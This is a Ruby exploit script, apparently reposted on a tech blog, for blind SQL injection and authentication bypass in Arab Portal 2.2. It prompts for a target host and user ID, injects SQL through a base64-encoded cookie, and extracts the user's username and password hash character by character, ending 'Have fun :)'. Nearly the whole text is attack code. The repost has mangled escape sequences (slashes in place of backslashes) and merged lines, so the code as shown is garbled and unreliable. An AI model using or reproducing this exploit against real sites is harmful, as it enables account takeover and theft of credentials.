Arab Portal 2.2 (Auth Bypass) Blind SQL Injection

技术2022-05-12 12

#!/usr/bin/ruby

#=============================================## Arab Portal v2.2 Exploit #,# Blind SQL Injection / Authentication Bypass ## Discovered & written by: Jafer Al-Zidjali ## Email: jafer@scorpionds.com ## Website: www.scorpionds.com ##=============================================#

require "net/http"require "base64"

intro=[ "+=============================================+", "+ Arab Portal v2.2 Exploit +", "+ Blind SQL Injection / Authentication Bypass +", "+ Discovered & written by: Jafer Al-Zidjali +", "+ Email: jafer@scorpionds.com +", "+ Website: www.scorpionds.com +", "+=============================================+" ]

print_intro intro

puts "/nEnter host name (e.g. example.com):"host=gets.chomp

puts "/nEnter script path (e.g. /arabportal/):"path=gets.chomp

puts "/nEnter userid:"userid=gets.chomp

puts "/nGetting cookie value..."

http = Net::HTTP.new(host, 80)

resp= http.get(path)cookie = resp.response["set-cookie"]

len=cookie.split("; ").lengthmax=0login_info=""

len.times do |count| clen=cookie.split("; ")[count].length if clen > max then max=clen login_info=cookie.split("; ")[count] endend

login_info=login_info.split(", ")

if login_info[0].length > login_info[1].lengthlogin_info=login_info[0]elselogin_info=login_info[1]end

login_info=login_info.split("=")[0]

puts "Cookie name is: "+login_info

puts "/nWhat do you want to do?"puts "1. Get username."puts "2. Get password hash."

opt=gets.chomp

if opt=="1" unamelen=0 print "/nGetting username length"

20.times do |x| stmt="#{userid}"+ "/x27/x20/x61/x6e/x64/x20/x6c"+ "/x65/x6e/x67/x74/x68/x28/x75"+ "/x73/x65/x72/x6e/x61/x6d/x65"+ "/x29/x3d#{x}/x20/x6f/x72/x20/x27/x27/x3d/x27"

shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+ "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+ "/x72/x61/x62/x70/x6f/x72/x74/x61"+ "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+ "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+ stmt.length.to_s+ "/x3a/x22"+ stmt+ "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+ "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+ "/x31/x3a/x22/x61/x22/x3b/x7d"

header={ "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"") }

resp= http.get(path,header) if resp.body =~ /action=logout/ puts "/nLength is: #{x}" unamelen=x break else print "." STDOUT.flush end end

chars="abcdefghijklmnopqrstuvwxyz0123456789"

print "/nGetting username: " unamelen.times do |z| chars.scan(/./) do |c| stmt="#{userid}"+ "/x27/x20/x61/x6e/x64/x20/x73"+ "/x75/x62/x73/x74/x72/x69/x6e"+ "/x67/x28/x75/x73/x65/x72/x6e"+ "/x61/x6d/x65/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27/x20/x6f/x72/x20/x27/x27/x3d/x27"

header={ "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"") } print c STDOUT.flush http = Net::HTTP.new(host, 80) resp= http.get(path,header) if resp.body =~ /action=logout/ break end print "/b" end end puts "/nHave fun :)"

elsif opt=="2" chars="0123456789abcdef"

print "/nGetting password hash: " 32.times do |z| chars.scan(/./) do |c| stmt="#{userid}"+ "/x27/x20/x61/x6e/x64/x20/x73/x75"+ "/x62/x73/x74/x72/x69/x6e/x67/x28"+ "/x70/x61/x73/x73/x77/x6f/x72/x64"+ "/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27"+ "/x20/x6f/x72/x20/x27/x27/x3d/x27" shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+ "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+ "/x72/x61/x62/x70/x6f/x72/x74/x61"+ "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+ "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+ stmt.length.to_s+ "/x3a/x22"+ stmt+ "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+ "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+ "/x31/x3a/x22/x61/x22/x3b/x7d" header={ "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"") } print c STDOUT.flush http = Net::HTTP.new(host, 80) resp= http.get(path,header) if resp.body =~ /action=logout/ break end print "/b" end end puts "/nHave fun :)"end

专利

最新回复(0)